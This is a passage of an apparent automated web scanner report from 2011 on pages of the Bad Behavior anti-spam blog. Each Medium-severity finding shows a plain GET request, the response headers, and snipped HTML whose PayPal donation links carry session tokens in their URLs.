</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=HAVwKFBi7sCLRKhF5CxA4YY1wv6k9bcwVnliqWWJT3JrRYy_5qrJHFSSPY0&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>If Bad Behavior has helped you, please <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=r4muB6p8d43ZgAcEbv0TK_qTAv74uRzkOEwHoUdfDfH-GC6LLNq17R0SPAS&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">make a financial contribution</a>
...[SNIP]...

5.29. http://bad-behavior.ioerror.us/2009/06/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /2009/06/

Request

GET /2009/06/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762112+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 19596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=Ed0AJ6uY6vTCDhYcOXxHu3M5RAo_EvZQItq6da_tLaPTJftp_oTKJ48VBzK&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>Thank you to everyone who has chosen to <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=Ed0AJ6uY6vTCDhYcOXxHu3M5RAo_EvZQItq6da_tLaPTJftp_oTKJ48VBzK&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">make a financial contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=FRTxFf7ij0h1bLxP5c1L1H_ud9WNjP2_PSeHAU3hRp6P4oDbNB8oKF2Ph1m&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>With the economy the way it is, I&#8217;ve had to spend the past few months on projects which pay the bills, with Bad Behavior on the back burner. If Bad Behavior has helped you, please <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=FRTxFf7ij0h1bLxP5c1L1H_ud9WNjP2_PSeHAU3hRp6P4oDbNB8oKF2Ph1m&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">make a financial contribution</a>
...[SNIP]...

5.30. http://bad-behavior.ioerror.us/2009/09/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /2009/09/

Request

GET /2009/09/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762110+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 17984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=ciy6QkMlF7gUAn2u0WTiwHLaPlLqUoZX_hsjf2hzQ072ipIVNqp9q1vz1be&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>Thank you to everyone who has chosen to <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=ciy6QkMlF7gUAn2u0WTiwHLaPlLqUoZX_hsjf2hzQ072ipIVNqp9q1vz1be&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">make a financial contribution</a>
...[SNIP]...

5.31. http://bad-behavior.ioerror.us/2009/10/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /2009/10/

Request

GET /2009/10/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762110+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 21027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=V3hy6yeoouaSlMRJBJtdCmC9SXZ5fSLSu3ft015ka6Ec91oPLT6mIp60_iq&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>Thank you to everyone who has chosen to <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=V3hy6yeoouaSlMRJBJtdCmC9SXZ5fSLSu3ft015ka6Ec91oPLT6mIp60_iq&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">make a financial contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=Tw-tG03UgGmFCsqn5Yu25t8PYHRDby9Iu42nCYIEw8XtauUiFioObuGnrc0&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>Thank you to everyone who has chosen to <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=Tw-tG03UgGmFCsqn5Yu25t8PYHRDby9Iu42nCYIEw8XtauUiFioObuGnrc0&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">make a financial contribution</a>
...[SNIP]...

5.32. http://bad-behavior.ioerror.us/2009/11/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /2009/11/

Request

GET /2009/11/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762109+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 39196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=ldJ4sNBGjqkl5hYLi1uIZB2ennmbid6atnqRY5ZzybeUXJZPWFCCo2oavT4&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>Thank you to everyone who has chosen to <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=ldJ4sNBGjqkl5hYLi1uIZB2ennmbid6atnqRY5ZzybeUXJZPWFCCo2oavT4&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">make a financial contribution</a>
...[SNIP]...
mit me to do any further work on Bad Behavior, mainly due to the economic recession. If you want this work to continue, as I&#8217;ll outline in the roadmap below, skip your morning latte tomorrow and <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=OH3mJ6NXfze8o040uEdprlhPGXGGKTnTUbSaeBLI5IEagIoxsVG6U_PVX64&amp;dispatch=5885d80a13c0db1f8e263663d3faee8d9384d85353843a619606282818e091d0">send me a financial contribution</a>
...[SNIP]...
>Only one thing remains, and that is to do the work. As I noted before, Bad Behavior is a user-supported project. If you think this roadmap looks good, and want to accelerate Bad Behavior development, <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=OH3mJ6NXfze8o040uEdprlhPGXGGKTnTUbSaeBLI5IEagIoxsVG6U_PVX64&amp;dispatch=5885d80a13c0db1f8e263663d3faee8d9384d85353843a619606282818e091d0">your financial contribution</a>
...[SNIP]...
ling $500 or more would allow me time to complete the majority of the above within a month. I know that a lot of you are having financial trouble due to the economy; so am I. Even if you are unable to <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=OH3mJ6NXfze8o040uEdprlhPGXGGKTnTUbSaeBLI5IEagIoxsVG6U_PVX64&amp;dispatch=5885d80a13c0db1f8e263663d3faee8d9384d85353843a619606282818e091d0">send a contribution</a>
...[SNIP]...
<p>This is also the time to send in feature requests. If Bad Behavior doesn&#8217;t do something you would like it to do, please leave a comment. (And remember that feature requests accompanied by a <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=OH3mJ6NXfze8o040uEdprlhPGXGGKTnTUbSaeBLI5IEagIoxsVG6U_PVX64&amp;dispatch=5885d80a13c0db1f8e263663d3faee8d9384d85353843a619606282818e091d0">contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=DX9a18rVacMq4jm46XSi8VqnZi4FUpEx8U2uB7D0kslQ68fvRz4JQhJx0V8&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>Thank you to everyone who has chosen to <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=PCJPgnX7f5vR_17EQl6w8A8K74TR0lDUA4wnJSrfOkt2W7kWMJ2EBm4zZHO&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">make a financial contribution</a>
...[SNIP]...

5.33. http://bad-behavior.ioerror.us/category/akismet/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /category/akismet/

Request

GET /category/akismet/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:12:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761955+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 29629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=FAc_AWrNLDvDwFWW5ToqC6Id1_ab8HT_qpQw8Nx8RRUgoKRgoe3HwCW9MJ4&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>And as always, if you find Bad Behavior valuable, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=FAc_AWrNLDvDwFWW5ToqC6Id1_ab8HT_qpQw8Nx8RRUgoKRgoe3HwCW9MJ4&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=RXaeFgvQxJr97iSGnAzIWZqBWatF-JLMYkE2jzBJBF7qSSnWGQHHh3TUb-u&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...

5.34. http://bad-behavior.ioerror.us/category/blog-spam/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /category/blog-spam/

Request

GET /category/blog-spam/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:12:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761976+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 59636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=ciy6QkMlF7gUAn2u0WTiwHLaPlLqUoZX_hsjf2hzQ072ipIVNqp9q1vz1be&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>Thank you to everyone who has chosen to <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=ciy6QkMlF7gUAn2u0WTiwHLaPlLqUoZX_hsjf2hzQ072ipIVNqp9q1vz1be&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">make a financial contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=Ed0AJ6uY6vTCDhYcOXxHu3M5RAo_EvZQItq6da_tLaPTJftp_oTKJ48VBzK&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>Thank you to everyone who has chosen to <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=Ed0AJ6uY6vTCDhYcOXxHu3M5RAo_EvZQItq6da_tLaPTJftp_oTKJ48VBzK&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">make a financial contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=FRTxFf7ij0h1bLxP5c1L1H_ud9WNjP2_PSeHAU3hRp6P4oDbNB8oKF2Ph1m&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>With the economy the way it is, I&#8217;ve had to spend the past few months on projects which pay the bills, with Bad Behavior on the back burner. If Bad Behavior has helped you, please <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=FRTxFf7ij0h1bLxP5c1L1H_ud9WNjP2_PSeHAU3hRp6P4oDbNB8oKF2Ph1m&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">make a financial contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=Ys8MAhDM6x4k3E1RZrHEHz6oy7cOnzYVT8rTLFiHPaOmAK7T_7aMq87yOMG&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>If Bad Behavior has helped you, please <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=Ys8MAhDM6x4k3E1RZrHEHz6oy7cOnzYVT8rTLFiHPaOmAK7T_7aMq87yOMG&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">make a financial contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=O0TYuXfCXDEkp9fjembSwTsNscMGBoRzxPjb6rpAsEgB5FJ6iCXhkM3HqgC&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
rs will find honest work instead, and to do so requires a significant amount of time and resources. If you&#8217;d like to help make spam a losing proposition and help stop spammers before they start, <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=O0TYuXfCXDEkp9fjembSwTsNscMGBoRzxPjb6rpAsEgB5FJ6iCXhkM3HqgC&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">make a financial contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=oIGvP-lmgaK2cmKSdEE3JVDL86mY7MfVHvCZw-rRZIsQKbn71pjx42zLLem&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>If you find Bad Behavior useful, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=oIGvP-lmgaK2cmKSdEE3JVDL86mY7MfVHvCZw-rRZIsQKbn71pjx42zLLem&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=6hW8DRHNinJTppQriX-Is1BMLPsOg1CLmATylbT9MGeYsrJFlhcmAM3KBEi&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>If you find Bad Behavior useful, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=6hW8DRHNinJTppQriX-Is1BMLPsOg1CLmATylbT9MGeYsrJFlhcmAM3KBEi&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=kSSZj6S2wKxcq5zCl6I-TM6-_ZvCLlU83qWFABvdv0h68q2Tr_S9bE3WeNu&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>If you find Bad Behavior useful, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=kSSZj6S2wKxcq5zCl6I-TM6-_ZvCLlU83qWFABvdv0h68q2Tr_S9bE3WeNu&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...

5.35. http://bad-behavior.ioerror.us/category/blogging/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /category/blogging/

Request

GET /category/blogging/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:13:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761984+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 22596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=3oBgFUGQXuJpS_Xhgcz_0e7dbj9GtgvV2cvDg7vzEuoMfyNb5x3AUdeRQnK&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>As always, if you find Bad Behavior valuable, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=3oBgFUGQXuJpS_Xhgcz_0e7dbj9GtgvV2cvDg7vzEuoMfyNb5x3AUdeRQnK&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=vPfbWjYK3xALfgcSFcK3NJInkX4RW__qOnvDuBIFKbnPC85_5DebEz9WU34&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>And as always, if you find Bad Behavior valuable, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=vPfbWjYK3xALfgcSFcK3NJInkX4RW__qOnvDuBIFKbnPC85_5DebEz9WU34&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...

5.36. http://bad-behavior.ioerror.us/category/coppermine-photo-gallery/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /category/coppermine-photo-gallery/

Request

GET /category/coppermine-photo-gallery/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:13:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761984+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 15954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=6hW8DRHNinJTppQriX-Is1BMLPsOg1CLmATylbT9MGeYsrJFlhcmAM3KBEi&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>If you find Bad Behavior useful, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=6hW8DRHNinJTppQriX-Is1BMLPsOg1CLmATylbT9MGeYsrJFlhcmAM3KBEi&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...

5.37. http://bad-behavior.ioerror.us/category/drupal/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /category/drupal/

Request

GET /category/drupal/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
